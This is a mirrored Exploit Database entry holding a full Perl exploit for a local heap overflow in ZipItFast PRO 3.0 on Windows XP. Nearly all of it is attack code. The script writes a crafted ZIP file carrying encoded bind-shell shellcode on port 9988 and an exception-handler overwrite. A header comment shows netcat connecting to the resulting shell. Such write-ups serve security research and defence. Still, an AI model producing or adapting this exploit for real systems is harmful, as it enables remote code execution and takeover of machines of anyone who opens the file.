ZipItFast PRO 3.0 – Local Heap Overflow

• Exploit Database
• 120 阅读

• 作者： b33f
  日期： 2012-07-12
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/19776/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134

  #!/usr/bin/perl   #---------------------------------------------------------------------------# # Exploit: ZipItFast PRO v3.0 Heap-Overflow # # Author: b33f - http://www.fuzzysecurity.com/# # OS: Windows XP SP1# # DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/# # Software: https://www.exploit-db.com/apps/# # decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe # #---------------------------------------------------------------------------# # Sorry for reinventing the wheel but learning about heap-overflows # # requires you to take a step back and roll with the punches not unlike # # watching a David Lynch production ;))...# # # # - "Who is that lady with the log?"# # + "We call her the log-lady.."# #---------------------------------------------------------------------------# # root@bt:~# nc -nv 192.168.111.131 9988# # (UNKNOWN) [192.168.111.131] 9988 (?) open # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:\Documents and Settings\Owner\Desktop># #---------------------------------------------------------------------------#   use strict; use warnings; my $filename = "Exploit.zip";   my $head = "\x50\x4B\x03\x04\x14\x00\x00". "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00". "\xe4\x0f". "\x00\x00\x00"; my $head2 = "\x50\x4B\x01\x02\x14\x00\x14". "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\xe4\x0f". "\x00\x00\x00\x00\x00\x00\x01\x00". "\x24\x00\x00\x00\x00\x00\x00\x00"; my $head3 = "\x50\x4B\x05\x06\x00\x00\x00". "\x00\x01\x00\x01\x00". "\x12\x10\x00\x00". "\x02\x10\x00\x00". "\x00\x00";   # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t # [*] x86/alpha_mixed succeeded with size 744 (iteration=1) my $ph33r = "\x89\xe2\xda\xd5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" . "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" . "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" . "\x42\x75\x4a\x49\x39\x6c\x39\x78\x4c\x49\x55\x50\x47\x70" . "\x55\x50\x35\x30\x6f\x79\x59\x75\x54\x71\x78\x52\x52\x44" . "\x6e\x6b\x42\x72\x44\x70\x6e\x6b\x30\x52\x56\x6c\x4e\x6b" . "\x30\x52\x35\x44\x4e\x6b\x52\x52\x77\x58\x56\x6f\x68\x37" . "\x61\x5a\x46\x46\x64\x71\x79\x6f\x74\x71\x6f\x30\x6c\x6c" . "\x75\x6c\x65\x31\x33\x4c\x56\x62\x34\x6c\x31\x30\x6f\x31" . "\x4a\x6f\x64\x4d\x73\x31\x6a\x67\x6d\x32\x4c\x30\x70\x52" . "\x56\x37\x4e\x6b\x50\x52\x76\x70\x6c\x4b\x61\x52\x77\x4c" . "\x73\x31\x6a\x70\x4c\x4b\x37\x30\x52\x58\x6f\x75\x79\x50" . "\x72\x54\x73\x7a\x45\x51\x4a\x70\x42\x70\x4c\x4b\x32\x68" . "\x65\x48\x6c\x4b\x63\x68\x65\x70\x76\x61\x39\x43\x6b\x53" . "\x65\x6c\x77\x39\x4e\x6b\x76\x54\x4c\x4b\x76\x61\x48\x56" . "\x76\x51\x49\x6f\x55\x61\x79\x50\x6e\x4c\x6f\x31\x58\x4f" . "\x56\x6d\x45\x51\x38\x47\x66\x58\x69\x70\x42\x55\x6a\x54" . "\x74\x43\x53\x4d\x5a\x58\x77\x4b\x73\x4d\x64\x64\x33\x45" . "\x48\x62\x73\x68\x6e\x6b\x61\x48\x76\x44\x76\x61\x6a\x73" . "\x50\x66\x6e\x6b\x46\x6c\x62\x6b\x6c\x4b\x36\x38\x35\x4c" . "\x56\x61\x4b\x63\x6c\x4b\x43\x34\x6e\x6b\x33\x31\x7a\x70" . "\x6e\x69\x62\x64\x34\x64\x56\x44\x33\x6b\x63\x6b\x50\x61" . "\x31\x49\x73\x6a\x72\x71\x79\x6f\x59\x70\x32\x78\x33\x6f" . "\x32\x7a\x4e\x6b\x56\x72\x68\x6b\x6b\x36\x43\x6d\x71\x78" . "\x47\x43\x55\x62\x47\x70\x67\x70\x71\x78\x53\x47\x42\x53" . "\x50\x32\x31\x4f\x46\x34\x53\x58\x70\x4c\x30\x77\x76\x46" . "\x47\x77\x6b\x4f\x38\x55\x6f\x48\x6e\x70\x37\x71\x77\x70" . "\x77\x70\x65\x79\x6f\x34\x42\x74\x76\x30\x75\x38\x46\x49" . "\x6b\x30\x30\x6b\x53\x30\x79\x6f\x4e\x35\x30\x50\x62\x70" . "\x62\x70\x52\x70\x33\x70\x42\x70\x51\x50\x42\x70\x72\x48" . "\x68\x6a\x74\x4f\x39\x4f\x79\x70\x69\x6f\x4e\x35\x6e\x69" . "\x6f\x37\x34\x71\x4b\x6b\x76\x33\x63\x58\x66\x62\x65\x50" . "\x35\x77\x55\x54\x6e\x69\x4a\x46\x51\x7a\x56\x70\x33\x66" . "\x66\x37\x51\x78\x6f\x32\x39\x4b\x77\x47\x55\x37\x6b\x4f" . "\x4b\x65\x66\x33\x31\x47\x50\x68\x4d\x67\x48\x69\x75\x68" . "\x4b\x4f\x49\x6f\x4e\x35\x32\x73\x62\x73\x62\x77\x32\x48" . "\x43\x44\x68\x6c\x45\x6b\x6d\x31\x6b\x4f\x4e\x35\x42\x77" . "\x6f\x79\x78\x47\x52\x48\x62\x55\x70\x6e\x30\x4d\x75\x31" . "\x6b\x4f\x59\x45\x53\x58\x50\x63\x62\x4d\x32\x44\x73\x30" . "\x4f\x79\x79\x73\x63\x67\x56\x37\x73\x67\x35\x61\x39\x66" . "\x51\x7a\x66\x72\x36\x39\x61\x46\x58\x62\x6b\x4d\x63\x56" . "\x39\x57\x70\x44\x34\x64\x37\x4c\x53\x31\x57\x71\x4e\x6d" . "\x70\x44\x66\x44\x74\x50\x7a\x66\x75\x50\x42\x64\x62\x74" . "\x36\x30\x71\x46\x42\x76\x30\x56\x72\x66\x30\x56\x30\x4e" . "\x70\x56\x76\x36\x73\x63\x53\x66\x33\x58\x72\x59\x38\x4c" . "\x47\x4f\x4c\x46\x59\x6f\x4a\x75\x6f\x79\x59\x70\x50\x4e" . "\x53\x66\x71\x56\x59\x6f\x56\x50\x75\x38\x34\x48\x6f\x77" . "\x37\x6d\x63\x50\x59\x6f\x79\x45\x4f\x4b\x48\x70\x6c\x75" . "\x4c\x62\x31\x46\x45\x38\x6f\x56\x5a\x35\x4d\x6d\x6f\x6d" . "\x79\x6f\x5a\x75\x55\x6c\x37\x76\x53\x4c\x45\x5a\x4f\x70" . "\x79\x6b\x4d\x30\x43\x45\x73\x35\x4d\x6b\x63\x77\x77\x63" . "\x70\x72\x50\x6f\x70\x6a\x77\x70\x61\x43\x59\x6f\x79\x45" . "\x41\x41";   my $buf1 = "A" x 4064 . ".txt";   ################# # EAX => 256-bytes => 0x77fc3210 - 0x04 => 0x77fc320c (_VECTORED_EXCEPTION_NODE) # EDX => 260-bytes => 0x0012FA28 - 0x08 => 0x0012FA20 (PTR shellcode) # Jump over Blink and Flink => EB 0A ################# my $magic = "\xEB\x0A" . "\x0C\x32\xFC\x77" . "\x20\xFA\x12\x00";   ################## # Notice that the offsets don't correspond exactly. I experienced some buffer # expansion and compression depending on the buffer structure so keep that in # mind if you want to do some testing. # # Remember to set Anti-Debugging flags in your debugger.. # (immunity = > !hidedebug All_Debug) ################## my $buf2 = "\x90" x 253 . $magic . "A" x 300 . $ph33r . "A" x 2756 . ".txt";   my $zip = $head.$buf1.$head2.$buf2.$head3; open(FILE,">$filename") || die "[-]Error:\n$!\n"; print FILE $zip; close(FILE);